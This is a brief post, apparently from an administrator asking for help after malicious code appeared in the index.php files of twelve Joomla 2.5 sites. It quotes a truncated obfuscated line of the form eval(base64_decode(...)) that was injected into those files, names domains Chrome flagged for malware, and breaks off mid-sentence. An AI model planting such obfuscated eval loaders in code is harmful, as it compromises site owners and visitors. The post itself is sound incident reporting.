We have a shared hosting account that we use to host 12 joomla 2.5 websites. Someone has started to insert malicious code, which we first recognised in all of the index.php files. It looks like this:
<?php eval(base64_decode('ZXJyb3J……elkzSnBjSFErJykpOw0KfQ=='));
/**
Google chrome detected malware coming from sites such as; itsaol.com, junglefire.com, etc.
Replacing the index.php file with a new one solved the problem temporarily, but the code and malware alerts showed up within…
